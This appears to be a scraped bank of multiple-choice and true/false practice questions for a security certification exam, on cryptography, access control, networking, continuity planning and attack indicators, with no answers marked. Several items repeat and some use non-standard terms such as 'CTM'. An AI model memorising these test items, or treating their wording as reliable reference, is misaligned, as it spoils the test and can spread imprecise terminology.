Which cryptographic solution would be best suited for low-power devices, such as IoT devices,
embedded systems, and mobile devices?

• ECC

• DES

• RSA

• AES

Which of the cryptographic algorithms listed below is the least vulnerable to attacks?

• AES

• DES

• RC4
 • 3DES

Which of the following answers refers to a deprecated (largely replaced by AES) symmetric-key block
cipher encryption algorithm?

• ECDSA

• RSA

• IDEA

• DSA

What is the recommended replacement for DES?

• DSA

• RSA

• RC4

• AES

An IV is a random or pseudorandom value used in cryptography to ensure that the same plaintext input
does not produce the same ciphertext output, even when the same encryption key is used. The IV is
typically used with encryption algorithms in block cipher modes to enhance security by introducing
randomness to the encryption process.

• True

• False

Which of the answers listed below refers to a logical operation commonly used in the context of
cybersecurity, particularly in encryption and obfuscation techniques?

• AND

• OR

• NOT

• XOR

Which of the following answers refers to a block cipher mode that works by chaining the ciphertext
blocks together, such that each ciphertext block depends on the previous block?

• CBC

• GCM

• ECB

• CFB

Which cipher mode transforms a block cipher into a stream cipher enabling the encryption of
individual bits or bytes of data?

• CFB

• CBC
 • GCM

• ECB

A block cipher mode that combines a unique counter with encryption key to generate a stream of
pseudorandom data blocks which are then used for encrypting data is called:

• CBC

• GCM

• CFB

• CTM

Which of the block cipher modes listed below is the simplest/weakest and therefore not
recommended for use?

• CBC

• GCM

• ECB

• CTM

Which block cipher mode combines CTM for encryption with an authentication mechanism to ensure
both data confidentiality and integrity?

• CBC

• GCM

• ECB

• CFB

In cryptography, the number of bits in a key used by a cryptographic algorithm is referred to as key size
or key length. The key length determines the maximum number of combinations required to break the
encryption algorithm, therefore typically a longer key means stronger cryptographic security.

• True

• False

Which AES key length provides the highest level of security?

• 128-bit key

• 192-bit key

• 256-bit key

• 320-bit key

Which of the following answers refers to a protocol used to set up secure connections and exchange of
cryptographic keys in IPsec VPNs?

• SSL

• IKE
 • ESP

• DHE

An access control model that enforces the strictest set of access rules is known as:

• MAC

• RBAC

• DAC

• ABAC

Which of the acronyms listed below refers to a cryptographic software tool for secure email
communication and data protection?

• DES

• PEM

• EFS

• PGP

What type of action allows an attacker to exploit the XSS vulnerability?

• Code injection

• Banner grabbing

• PIN recovery

• Input validation

A type of vulnerability where the state of a resource is verified at one point in time but may change
before the resource is actually used is called:

• TOC

• TOC/TOU

• TOU

• TSIG

The term "SMS" is used in reference to:

• Text messaging services

• Enhanced messaging services

• Multimedia messaging services

• Rich communication services

Which of the following terms refers to a framework and knowledge base that provides understanding of
TTPs used during cyberattacks?

• CVSS
 • ATT&CK

• TAXII

• STIX

Which of the answers listed below refers to a security solution that provides the capability for
detection, analysis, response, and real-time monitoring of cyber threats at the device level?

• SWG

• CASB

• EDR

• NGFW

Which of the following answers refers to a system containing mappings of domain names to various
types of data, such as numerical IP addresses?

• TCP/IP

• DNS

• SQL

• DHCP

The term "OTA" refers to the process of wirelessly transmitting data, updates, or information to
electronic devices, such as smartphones, tablets, or IoT devices, typically using cellular networks, Wi-
Fi, or other wireless communication methods.

• True

• False

Which of the acronyms listed below refers to a piece of hardware and associated software/firmware
designed to provide cryptographic and key management functions?

• EFS

• HSM

• SFC

• TPM

What is a PUP? (Select 3 answers)

• A type of computer program not explicitly classified as malware by AV software

• An application downloaded and installed without the user's consent

• A type of software that may adversely affect the computer's security and performance,
compromise user's privacy, or display unsolicited ads

• An application downloaded and installed with the user's consent

• A type of computer program explicitly classified as malware by AV applications

• A type of free, utility software often bundled with a paid app

A measure of the likelihood that a biometric security system will incorrectly reject an access attempt
by an authorized user is referred to as:

• FAR

• CER

• CRC

• FRR

Which of the following enables the automation of vulnerability scanning and compliance checking?

• SAML

• OVAL

• SCAP

• SASE

Which of the acronyms listed below refers to a comprehensive strategy and set of procedures
designed to ensure that an organization can continue its critical operations and functions during and
after a disruptive event?

• BIA

• SLE

• BCP

• BPA

Given the computational limitations of IoT devices, smartcards, and mobile devices, which of the
following digital signature algorithms would be the most efficient choice due to its smaller key size and
lower computational requirements?

• RSA

• ECDHE

• DSA

• ECDSA

• ECC

Which type of software is used to prevent, detect, and remove malware from computer systems and
networks?

• IDS

• SaaS

• AV

• WAF

An estimate based on the historical data of how often a threat would be successful in exploiting a
vulnerability is known as:
 • ALE

• SLA

• ARO

• SLE

Which of the answers listed below refers to a rule-based access control mechanism associated with
files and/or directories?

• EFS

• FACL

• FIM

• NTFS

Which of the following answers refers to a DNS TXT record that allows the owner of a domain to specify
all the servers authorized to send mail from their domain?

• DKIM

• SRV

• CNAME

• SPF

Which of the answers listed below refers to a cryptographic method used to verify that a message or
data has remained unaltered during transmission and originates from an authorized source?

• MAC

• CBC

• PEM

• GCM

Which of the following answers refers to a network security technology designed to monitor WLANs for
unauthorized access, security threats, and suspicious activities?

• UTM

• WIDS

• NGFW

• WAF

Which of the acronyms listed below refers to a client-server protocol that provides centralized AAA
services for remote-access users?

• OAuth

• RADIUS

• LDAP
 • OpenID

Which type of software enables centralized administration of mobile devices?

• MFA

• MMC

• MDM

• MFD

Which of the following defines a file format for storing and exchanging personal identity information,
including private keys and digital certificates?

• P10

• P11

• P12

• P13

Which of the answers listed below refers to a cryptographic key exchange protocol that leverages ECC
for enhanced security and efficiency?

• IKE

• ECDHE

• DHE

• ECDSA

The term "MTTF" refers to a metric that represents the average amount of time a device or system is
expected to operate before experiencing its first failure.

• True

• False

In modern OSs, this feature prevents malicious code from executing in certain memory regions
intended for data.

• DEP

• ECB

• DLP

• CRC

Which of the following enables the exchange of information between computer programs?

• API

• UI

• Device drivers

• SDK
A cloud computing service model offering remote access to applications based on monthly or annual
subscription fee is called:

• PaaS

• SaaS

• IaaS

• DaaS

RTBH is a type of DDoS attack.

• True

• False

Which AES key length provides the highest level of security?

• 128-bit key

• 192-bit key

• 256-bit key

• 320-bit key

Which of the answers listed below refers to a specific type of ICS?

• SoC

• CVSS

• SCADA

• RTOS

The MIME specification extends the email message format beyond simple text, enabling the transfer of
graphics, audio, and video files over the Internet mail system. S/MIME is an enhanced version of the
MIME protocol that enables email security features by providing encryption, authentication, message
integrity, and other related services.

• True

• False

Which part of the IPsec protocol suite provides authentication and integrity?

• CRC

• AH

• SIEM

• AES

A detailed agreement between a client and a vendor describing the work to be performed on a project is
referred to as:

• MSA
 • SLA

• WO

• SOW

Which of the following answers refers to an analog telephone service providing basic voice
communication over copper telephone lines?

• PSTN

• ISDN

• PBX

• POTS

A protocol designed to improve the security of existing WEP implementations is known as:

• SRTP

• TKIP

• CCMP

• WPA2

Which of the acronyms listed below refers to a technology used in cameras and surveillance systems
that enables remote control of camera functions?

• RDP

• CCTV

• PTZ

• TCP/IP

Which of the following devices would be used for connecting a router to a T1 line?

• CSU

• IDF

• NIC

• EDR

What are the applications of PGP? (Select 3 answers)

• Compressing data

• Encrypting and decrypting data

• Signing and verifying digital signatures

• Managing public and private keys

• Securing website traffic

A field in an SSL/TLS certificate that allows the certificate to be used for multiple domain names or IP
addresses is referred to as:

• CNAME

• SAN

• MX

• PTR

Which of the answers listed below refers to a tunneling protocol commonly used in creating VPNs?

• VRRP

• GRE

• RTSP

• BGP

Which of the following answers refers to a professional that oversees the management and
maintenance of an information repository?

• CTO

• PM

• DBA

• CIO

Which of the terms listed below refers to a US government initiative for real-time sharing of cyber threat
indicators?

• NVD

• AIS

• TTP

• CVSS

A type of OS characterized by low delay between the execution of tasks required in specific
applications, such as in military missile guidance systems or in automotive braking systems, is known
as:

• UNIX

• Windows NT

• POSIX

• RTOS

Which of the following block cipher modes is the simplest/weakest and therefore not recommended for
use?

• CBC

• GCM
 • ECB

• CTR

Which communication method supports real-time text-based messaging, multimedia sharing, group
chats, and video calls?

• SMS

• MMS

• IM

• RTC

Which senior executive position assumes the responsibility for protecting assets, data, and people
from potential threats?

• CEO

• CIO

• CSO

• CTO

Which cybersecurity role is primarily responsible for hands-on implementation and oversight of
security measures for specific systems and networks?

• CSO

• CTO

• DPO

• ISSO

A company or organization that offers cloud computing services over the Internet is called:

• ISP

• MSSP

• CSP

• MSP

Which of the terms listed below refers to a global community focused around the development of
engineering standards?

• ANSI

• NIST

• CERT

• IEEE

Which of the following answers refers to a device designed to supply (and monitor the quality of)
electric power to multiple outlets?
 • PSU

• MDF

• PDU

• IDF

Which of the answers listed below refers to a global standard development organization composed of
different national standards bodies?

• NIST

• ISO

• IEEE

• ANSI

Which of the following acronyms refers to the process of identifying and preparing for potential
disruptions or unexpected events to ensure business continuity?

• BIA

• SLE

• CP

• BPA

A dedicated local network consisting of devices providing data access is referred to as:

• SDN

• NAS

• iSCSI

• SAN

Which senior executive is responsible for managing an organization's IT strategy and systems?

• CEO

• CIO

• CSO

• CTO

Which of the answers listed below refers to a framework used on Unix-like OSs to manage
authentication-related tasks?

• PAM

• SSO

• MFA

• OAuth
Which of the following answers refers to a network protocol for delivering audio and video over IP
networks?

• RDP

• VoIP

• RTP

• UDP

Which of the terms listed below refers to a specialized suite of software tools used for developing
applications for a specific platform?

• GUI

• SDLC

• API

• SDK

A type of software that serves as an intermediary between users and the hardware, allowing users to
interact with the computer and run applications is known as:

• ROM

• BIOS

• OS

• RAM

Which of the following answers refers to an encryption protocol primarily used in Wi-Fi networks
implementing the WPA2 security standard?

• TKIP

• CCMP

• SSL

• HMAC

In telecommunications, a type of main hub connecting internal networks with outside cabling is called:

• MDF

• ICS

• MDI

• IDF

Which of the acronyms listed below refers to a protocol used in network management systems for
monitoring network-attached devices?

• SSH

• VNC
 • SNMP

• RDP

Which of the following answers refers to a routing protocol?

• RTP

• BGP

• RDP

• EAP

A specific URI type most commonly used to identify web pages is referred to as:

• DOI

• ISBN

• OUI

• URL

Which of the answers listed below refers to a solution that simplifies web browser configurations by
using predefined rules or scripts to make server selection decisions for specific web traffic?

• PAC

• DDNS

• PAM

• NAT

Which of the following terms refers to a network of physical devices, vehicles, buildings, and other
items embedded with sensors, software, and other technologies that connect and exchange data with
other devices and systems over the Internet?

• SoC

• PAN

• IoT

• WMN

Which of the answers listed below refers to a unique 32-bit identifier embedded in older mobile
phones and used by network operators to identify and authenticate the device on the cellular network?

• MAC

• ESN

• IP

• OID

Which of the following answers refers to a software-based solution that allows users to access and
interact with a virtual OS from anywhere using any device with an Internet connection?
 • VDU

• VTC

• VDE

• VNC

Which of the acronyms listed below refers to a broader term used to describe an organization
responsible for responding to computer-related emergencies?

• CIRT

• CERN

• CERT

• CSIRT

Which of the following acronyms refers to a discontinued research program focused on promoting
innovation and development in the field of telecommunications and information technology?

• IETF

• CERN

• DARPA

• RACE

Which of the answers listed below refers to a team of experts within an organization focused on
responding to a wide variety of computer-related incidents?

• CERT

• CSIRT

• CIRT

• CERN

GPG is used for: (Select all that apply)

• Securing website traffic

• Managing public and private keys

• Signing and verifying digital signatures

• Compressing data

• Encrypting and decrypting data

A software system that integrates and manages various business processes and functions across an
organization is known as:

• BCP

• CMS

• ERP
 • BIA

What is RIPEMD?

• Block cipher encryption mode

• Digital signature algorithm

• Family of cryptographic hash functions

• Symmetric encryption algorithm

Which of the following acronyms refers to a dedicated facility responsible for monitoring, detecting,
investigating, and responding to cybersecurity incidents?

• NOC

• C2

• ISAC

• SOC

Which of the following solutions would be best suited for a company that needs comprehensive IT
services but lacks qualified IT personnel?

• MSA

• MaaS

• MSP

• MSSP

Which of the terms listed below refers to a third-party vendor offering IT security management
services?

• MSP

• MaaS

• MSA

• MSSP

Previous

Which of the following acronyms refers to the broad category of hardware and software systems used
for monitoring and controlling physical devices, processes, and industrial operations?

• ICS

• OT

• SCADA

• EDR

Previous

Which of the answers listed below refers to a basic method for establishing a dedicated point-to-point
link between two networked devices?

• PPTP

• IGMP

• PPP

• MPLS

Previous

Which of the answers listed below refers to a basic method for establishing a dedicated point-to-point
link between two networked devices?

• PPTP

• IGMP

• PPP

• MPLS

Which of the following defines the maximum acceptable amount of data loss measured by a specific
point in time before a disaster or outage?

• RPO

• MTBF

• RTO

• MTTR

Which of the terms listed below refers to a framework for managing access to digital resources?

• PAM

• SSO

• IAM

• MFA

Which of the following answers refer to SCAP? (Select 3 answers)

• A type of security system designed to collect logs and events from various sources

• Designed to provide a centralized user interface for accessing collected data

• A collection of standards developed by NIST

• Provides a common language for communicating security information

• Allows different security tools to share data and work together more effectively

• Enables real-time threat detection, incident response, and compliance monitoring

A Windows feature used for centrally managing and enforcing policies and settings for users and
computers in a network is referred to as:
 • SAE

• NTLM

• GPO

• SSO

Which of the answers listed below refers to a protocol used for automating the issuance and
management of certificates within a PKI environment?

• PKCS

• SCEP

• CSR

• OCSP

Which of the following answers refer to the characteristic features of RSA? (Select 3 answers)

• Asymmetric encryption algorithm

• A public key used for encryption and a private key used for decryption

• Suitable for bulk data encryption

• Used for secure communications, digital signatures, and key exchange

• Symmetric encryption algorithm

• A single key used for both encryption and decryption

Which of the answers listed below describe the characteristics of a non-persistent VDI? (Select 2
answers)

• At the end of a session, user desktop reverts to its original state

• Each user runs their own copy of virtual desktop

• At the end of a session, user data and personal settings are saved

• Virtual desktop is shared among multiple users

Which of the following answers refers to an obsolete protocol used for secure data transfer over the
web?

• SMTPS

• SRTP

• SHTTP

• S/MIME

In a persistent VDI: (Select 2 answers)

• Each user runs their own copy of virtual desktop

• At the end of a session, user desktop reverts to its original state

 • Virtual desktop is shared among multiple users

• At the end of a session, user data and personal settings are saved

An authentication mechanism that generates one-time passwords based on a counter value and a
secret key is known as:

• OAuth

• HOTP

• RADIUS

• TOTP

Which of the acronyms listed below refers to a documented process for addressing identified issues
and preventing their repetition?

• DRP

• COOP

• QA

• CAR

Which of the following answers refers to a software tool designed to simplify the process of creating
and maintaining online content?

• VDI

• SaaS

• CMS

• SDK

Which block cipher mode combines CTM for encryption with an authentication mechanism to ensure
both data confidentiality and integrity?

• CBC

• GCM

• ECB

• CFB

The term "FPGA" refers to a reconfigurable integrated circuit that can be programmed and customized
to perform various digital functions and tasks.

• True

• False

Which of the answers listed below refer to SIEM? (Select 3 answers)

• Allows different security tools to share data and work together more effectively

• Designed to provide a centralized user interface for accessing collected data

 • A collection of standards developed by NIST

• Enables real-time threat detection, incident response, and compliance monitoring

• A type of security system designed to collect logs and events from various sources

• Provides a common language for communicating security information

Which of the following answers refers to a trusted third-party service for validating user identity in a
federated identity system?

• RA

• IdP

• CA

• Kerberos

Which of the answers listed below refers to a deprecated TLS-based method for securing SMTP?

• IDPS

• STARTTLS

• DKIM

• SMTPS

Which of the following enables running macros in Microsoft Office applications?

• DOM

• API

• DLL

• VBA

Which of the answers listed below refers to a language used to structure and describe data in a format
that is both human- and machine-readable?

• HTML

• XML

• JSON

• XHTML

In SNMP, each node in a MIB is uniquely identified by a(n):

• OID

• IP

• OUI

• MAC

Which of the following acronyms refers to a block cipher mode that works by chaining the ciphertext
blocks together, such that each ciphertext block depends on the previous block?

• CBC

• GCM

• ECB

• CFB

Which of the answers listed below refers to a dedicated protocol designed for enabling real-time text-
based communication over the Internet?

• IRC

• RTC

• IM

• MMS

A specialized electronic component that accelerates visual rendering is called:

• TPU

• GPU

• DSP

• CPU

Which of the following answers refers to a protocol that enables the exchange of messages and data
between applications running on different OSs and using different programming languages?

• VDE

• SOAP

• VDI

• SMTP

Which of the answers listed below refers to a deprecated MS Windows authentication protocol
replaced by Kerberos?

• PPTP

• WEP

• NTLM

• SNMPv2

Which of the following enables delivery of various data packet types over the same network link?

• LWAPP

• MPLS

• MLPPP
 • MIBS

Which of the answers listed below refers to a Windows-specific feature for handling exceptions, errors,
and abnormal conditions in software?

• EPC

• SEH

• EH

• EXR

Which of the following acronyms refers to a security mechanism used in the DNS to authenticate and
secure communications between DNS servers during zone transfers and other transactions?

• SOA

• DKIM

• SPF

• TSIG

Which of the answers listed below refers to a cable rack that interconnects wiring between an MDF and
workstation devices?

• ICS

• MDI

• IDF

• MTU

Which of the following technologies enables automated handling of multiple security incidents?

• SOAP

• SIEM

• SOAR

• SASE

What is the name of a solution that increases the efficiency of IP address space management by
allowing network administrators to divide networks into subnets of different sizes?

• DNAT

• VLSM

• MPLS

• VLAN

What is the fastest way for checking the validity of a digital certificate?

• CRL

• OSPF
 • CSR

• OCSP

Which of the terms listed below refers to a process of intercepting network traffic data for analysis and
troubleshooting purposes?

• AIS

• PCAP

• EDR

• MaaS

In a Kerberos-protected network, this type of secure token is granted to users during their initial login to
enable them access to multiple network services without the need to re-enter their login information.

• OTP

• TGT

• AS

• TGS

Which of the following answers refers to a language primarily used for automating the assessment of
security vulnerabilities and configuration issues on computer systems?

• OVAL

• SAML

• XML

• SOAP

A remote access authentication protocol used primarily in Microsoft networks that periodically re-
authenticates client at random intervals to prevent session hijacking is known as:

• PEAP

• MSCHAP

• LEAP

• CHAP

Which of the acronyms listed below refers to a formal and legally binding document that specifies
detailed terms, obligations, and responsibilities of all parties involved?

• SOW

• MOA

• MSA

• MOU

Which of the following answers refers to CSRF?

 • A cyberattack in which an attacker intercepts and maliciously retransmits data or
authentication requests to gain unauthorized access or impersonate a legitimate user or system

• A type of malicious attack where unauthorized commands are transmitted from a user's
browser to a web application without their knowledge or consent, often leading to actions being
taken on their behalf

• A security vulnerability that allows attackers to inject malicious scripts into web pages viewed
by other users, potentially leading to data theft or manipulation

• A type of cyberattack where malicious code is injected into a web application's input fields to
manipulate the database and gain unauthorized access to data or perform malicious actions

ARP provides:

• IP-to-FQDN mapping

• MAC-to-IP mapping

• FQDN-to-IP mapping

• IP-to-MAC mapping

A set of procedures put in place to recover IT systems and data following a major disruption is called:

• DRP

• BIA

• SLE

• BCP

Which of the answers listed below refers to a network protocol used for synchronizing clocks over a
computer network?

• NTP

• VTP

• NNTP

• RTP

An integrated circuit combining components typically found in a standard computer system is referred
to as:

• HSM

• TPM

• SoC

• BIOS

Which of the following acronyms refers to a document that authorizes, initiates, and tracks the
progress and completion of a particular job or task?

• SOW
 • WO

• SLA

• MSA

Which of the answers listed below refers to a protocol used by routers, hosts, and network devices to
generate error messages and troubleshoot problems with delivery of IP packets?

• CCMP

• RSTP

• ICMP

• SNMP

Which of the following terms refer to the characteristic features of DSL? (Select 3 answers)

• Leased lines

• Copper cabling

• Telephone lines

• Fiber-optic cabling

• Last mile solutions

• WAN links

A type of trusted third party that issues digital certificates used for creating digital signatures and
public-private key pairs is known as:

• RA

• IKE

• CA

• CSP

Which of the answers listed below refers to a mobile device deployment model that allows employees
to use private mobile devices for accessing company's restricted data and applications?

• COPE

• BYOD

• JBOD

• CYOD

What is the name of a U.S. government initiative providing a set of procedures and plans that an
organization can implement to ensure continued performance of its essential functions during
unexpected events?

• SLA

• COOP
 • RPO

• BCP

Which of the following answers refers to a policy framework that allows domain owners to specify how
email receivers should handle emails that fail authentication checks?

• DKIM

• SPF

• PGP

• DMARC

Which of the answers listed below refers to a deprecated wireless authentication protocol developed
by Cisco?

• PEAP

• EAP-TTLS

• LEAP

• EAP-TLS

A cloud-based solution that provides ongoing oversight and supervision of IT assets and services is
called:

• PaaS

• IaaS

• SaaS

• MaaS

Which of the following terms is used to describe all aspects of software development?

• PLC

• SDLC

• QA

• SDLM

Which of the answers listed below refers to a markup language for exchanging authentication and
authorization data?

• SAML

• XML

• SOAP

• XHTML

What are the characteristic features of SAML? (Select 3 answers)

• Enables only the exchange of SSO authorization data

 • Handles both authentication and authorization for SSO

• Uses XML for data exchange

• Commonly used in enterprise environments and legacy systems

• Enables only the exchange of SSO authentication data

• Uses JSON for data exchange

• Specifically designed for web and mobile applications

Which DNS TXT records are used for spam management? (Select 3 answers)

• SPF

• DKIM

• SRV

• DMARC

• PTR

Which of the following terms can be used as a synonym for an aerial drone?

• UGV

• UAV

• USV

• UAP

A software development approach that aims for speedy application creation and continuous
improvement through iterative development and user collaboration is referred to as:

• FDD

• DevOps

• RAD

• SaaS

Which of the protocols listed below is referred to as a connectionless, unreliable, or best-effort

protocol?

• MPLS

• TCP

• SMTP

• UDP

Which of the following answers refers to a software tool that provides a single management interface
for mobile devices, PCs, printers, IoT devices and wearables?

• MDM
 • RCS

• UEM

• MAM

Which of the answers listed below refers to a technology that allows USB devices to act as both hosts
and peripherals, enabling them to connect to and communicate with other USB devices directly
without the need for a computer or dedicated host?

• PnP

• OTG

• P2P

• HCI

A messaging service that allows users to send content such as images, videos, and audio along with
text messages to mobile devices is known as:

• MMS

• IRC

• IM

• SMS

What is a common target of XSS?

• Physical security

• Alternate sites

• Dynamic web pages

• Removable storage

Which of the following answers refers to a security policy enforcement software tool or service placed
between cloud service users and cloud applications?

• UTM

• CASB

• NGFW

• DMVPN

Which of the answers listed below refers to a set of procedures put in place to recover IT systems and
data following a major disruption?

• BCP

• DRP

• IRP

• ERP
A technology that enables real-time analysis of security alerts generated by network hardware and
applications is called:

• LACP

• DSCP

• SIEM

• LWAPP

Which of the following acronyms refers to a senior executive responsible for technology-related
decision-making and planning?

• CIO

• CEO

• CTO

• CSO

A network protocol used for secure file transfer over SSH is known as:

• TFTP

• SFTP

• SCP

• FTPS

Which of the answers listed below refers to a virtualization platform for delivering virtual desktops to a
community of users?

• VDE

• VNC

• VDI

• RDP

A solution that simplifies configuration of new wireless networks by allowing non-technical users to
easily configure network security settings and add new devices to an existing network is called:

• WPA

• WPS

• WEP

• WAP

Which of the following answers refers to a text-based command interpreter and scripting language for
Unix-like operating systems?

• CLI

• JS
 • Bash

• cmd.exe

A networking hardware device connecting wireless devices to a wired network is referred to as:

• WAF

• AP

• RAS

• NIC

Which of the answers listed below refers to a mobile device deployment model where organizations
provide and own the devices while allowing their personal use?

• BYOD

• COPE

• VDI

• CYOD

Which of the following answers refers to a non-cryptographic hash function often used for error-
checking purposes?

• MD5

• CRC

• SHA

• RIPEMD

What is the name of a network layer protocol that specifies the format of packets and addressing
scheme in network communications?

• UDP

• IP

• TCP

• NetBIOS

The term "P2P" refers to a centralized network architecture in which each participant in the network
can act both as a client and a server, enabling direct communication and file sharing between
individual users without the need for a central server or intermediary.

• True

• False

Which of the answers listed below refers to a set of standards and specifications that define various
cryptographic techniques, including formats for public keys, private keys, digital signatures, and digital
certificates?

• ITIL
 • RFC

• PKCS

• ISO/IEC

Which of the following answers refers to a tunneling point-to-point protocol?

• EAP

• PPTP

• MPLS

• PPP

Which of the answers listed below refers to a logical operation commonly used in the context of
cybersecurity, particularly in encryption and obfuscation techniques?

• AND

• OR

• NOT

• XOR

Which of the following answers refers to a public-key cryptosystem used for digital signatures, secure
key exchange, and encryption?

• DHE

• RSA

• AES

• DSA

An authentication mechanism that generates one-time passwords based on the current time and a
secret key is known as:

• OAuth

• TOTP

• RADIUS

• HOTP

Which of the answers listed below refers to the process of maintaining the integrity of files and data?

• DLP

• SIEM

• FIM

• SHA

Which of the following provides a countermeasure against SPOF?

 • HA

• DLP

• VM

• AAA

In the AAA security architecture, the process of tracking accessed services as well as the amount of
consumed resources is called:

• Auditing

• Authentication

• Authorization

• Accounting

Which of the answers listed below refers to a method that enables secure conversion of user
passwords into cryptographic keys?

• PBKDF2

• PFS

• RIPEMD

• PKCS #7

Which of the following solutions provides passive network security breach response on an individual
computer system?

• HIDS

• NIPS

• HIPS

• NIDS

Which of the answers listed below refers to a system that identifies, defines, and catalogs publicly
known cybersecurity vulnerabilities?

• TAXII

• CVE

• STIX

• CVSS

Which of the following answers refers to a deprecated (largely replaced by AES) symmetric-key block
cipher encryption algorithm?

• ECDSA

• RSA

• IDEA
 • DSA

A limit on the maximum amount of data that can be transmitted over a network without fragmentation
is referred to as:

• DSU

• CSU

• FPS

• MTU

Which of the answers listed below refers to a standardized method employed by the U.S. federal
government to authenticate the identities of employees and contractors via smart card-based
credentials?

• PIV

• MFA

• SAE

• PKI

Which of the following answers refers to an organized approach to managing and mitigating security
incidents?

• XDR

• IR

• SOAR

• IRP

Which type of technology enables contactless payment transactions?

• NFC

• IR

• PED

• WAP

An agreement between a service provider and users defining the nature, availability, quality, and scope
of the service to be provided is known as:

• SOW

• MSA

• SLA

• MOU

Which of the answers listed below refers to a cybersecurity approach that focuses on recognizing and
addressing potential threats originating from multiple sources?

• XDR
 • WAF

• EDR

• SWG

Which of the following acronyms refers to a client authentication method used in WPA3?

• SAE

• IKE

• PSK

• AES

Which of the answers listed below refers to a solution used for authentication, authorization, and user
identity management?

• ICS

• AAA

• CIA

• IAM

Which of the following answers refers to a security solution that provides control over elevated (i.e.,
administrative type) accounts?

• MFA

• IAM

• SSO

• PAM

A device designed to provide emergency power during an unexpected main power source outage is
called:

• UPS

• PoE

• SVC

• PSU

Which of the answers listed below refers to an authentication method that enables the signing of an
outbound email message with a digital signature?

• SPF

• DKIM

• SRV

• DMARC

The term "VLAN" refers to a logical grouping of computers that allow computer hosts to function as if
they were attached to the same broadcast domain regardless of their physical location.

• True

• False

Which of the following answers refers to a method that binds a combination of private IP address and
port number with a corresponding public IP address and port information?

• PAT

• NAC

• DNS

• ARP

A file system format used in Windows OSs that offers improved performance, security, and file
management is referred to as:

• ext4

• EFS

• NTFS

• HFS+

A dot-dot-slash attack is also referred to as:

• Disassociation attack

• On-path attack

• Directory traversal attack

• Downgrade attack

A type of cryptographic attack that forces a network protocol to revert to its older, less secure version
is known as:

• Downgrade attack

• Replay attack

• Deauthentication attack

• Spraying attack

A hash collision occurs when cryptographic hash function produces two different digests for the same
data input.

• True

• False

Which cryptographic attack relies on the concepts of probability theory?

• Brute-force

• KPA
 • Dictionary

• Birthday

A short list of commonly used passwords tried against large number of user accounts is a
characteristic feature of:

• Replay attack

• Dictionary attack

• Spraying attack

• Birthday attack

Which password attack bypasses account-lockout policies?

• Birthday attack

• Replay attack

• Spraying attack

• Dictionary attack

An attack against encrypted data that relies heavily on computing power to check all possible keys and
passwords until the correct one is found is called:

• Replay attack

• Brute-force attack

• Dictionary attack

• Birthday attack

One of the measures for bypassing the failed logon attempt account lockout policy is to capture any
relevant data that might contain the password and brute force it offline.

• True

• False

A type of forensic evidence that can be used to detect unauthorized access attempts or other
malicious activities is called:

• CVE

• IoC

• AIS

• OSINT

An account lockout might indicate which type of malicious activity?

• Attempt to deliver malicious content

• DoS attack

• Account compromise
 • Password brute-forcing attempt

Which of the terms listed below most accurately describes a situation wherein a single account is
being used from multiple locations/devices at the same time?

• Spraying attack

• Concurrent session usage

• Single Sign-On (SSO)

• Impossible travel

Which of the following terms refers to a malicious activity indicator in a situation where a firewall or
other security measure prevents an attempt to deliver malicious payload or perform an unauthorized
action?

• DoS attack

• Resource inaccessibility

• Blocked content

• Excessive system resource consumption

Which of the terms listed below most accurately describes a situation wherein an account is accessed
from a location that is physically impossible for the user to be in?

• Login time restrictions

• Impossible travel

• Concurrent session usage

• Out-of-cycle logging

The term "Out-of-cycle logging" refers to instances where systems or applications produce logs
outside their regular intervals or in abnormal volumes, potentially signaling malicious activity.

• True

• False

Which of the following would indicate an attempt to hide evidence of malicious activity?

• Account lockout

• Resource inaccessibility

• Missing logs

• Concurrent session usage

Which of the terms listed below refers to a logical grouping of computers that allow computer hosts to
function as if they were attached to the same broadcast domain regardless of their physical location?

• VLAN

• DMZ

• SNMP community
 • VPN

What is the name of a solution that increases the efficiency of IP address space management by
allowing network administrators to divide networks into subnets of different sizes?

• DNAT

• VLSM

• MPLS

• VLAN

Which of the following provides granular control over user access to specific network segments and
resources based on their assigned roles and permissions?

• EDR

• IAM

• AAA

• IPS

Which of the answers listed below refers to a solution that allows for easier management and control
of network segmentation policies through software applications?

• VDI

• SDN

• VPC

• EDR

Which of the following acronyms refers to a set of rules that specify which users or system processes
are granted access to objects as well as what operations are allowed on a given object?

• ACL

• MFA

• NAC

• AUP

A rule-based access control mechanism implemented on routers, switches, and firewalls is referred to
as:

• MAC

• AUP

• DAC

• ACL

Which of the answers listed below refers to a rule-based access control mechanism associated with
files and/or directories?

• EFS
 • FACL

• FIM

• NTFS

Which of the following policies applies to any requests that fall outside the criteria defined in an ACL?

• Fair access policy

• Implicit deny policy

• Transitive trust

• Context-aware authentication

Which of the answers listed below does not refer to the concept of network isolation?

• VLANs

• Subnetting

• DLP

• Firewalls

• DMZs

• NAC

• SDN

• Air gaps

• Zero Trust network architecture

Which of the following answers does not refer to the concept of system/application isolation?

• Virtualization

• Containerization

• Sandboxing

• Data encryption

Which of the answers listed below refer(s) to client-based software threat vector(s)? (Select all that
apply)

• Drive-by download via web browser

• Malicious macro

• Vulnerability in a network protocol or device

• USB-based attack

• Malicious attachment in email application